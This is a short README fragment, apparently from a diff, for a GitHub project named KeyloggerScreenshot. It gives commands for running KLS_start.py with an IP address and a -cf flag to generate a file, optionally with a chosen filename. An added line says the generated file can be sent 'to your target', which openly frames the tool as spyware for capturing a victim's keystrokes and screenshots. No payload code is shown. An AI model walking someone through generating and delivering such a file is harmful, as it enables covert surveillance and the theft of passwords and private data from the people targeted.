Kill0geR/KeyloggerScreenshot/README.md

 To create a file:
 `python KLS_start.py -aip 127.0.0.1 -cf`

+You can send the created file to your target

 You can also specify the filename simply write the filename after -cf `python KLS_start.py -aip 127.0.0.1 -cf test.py`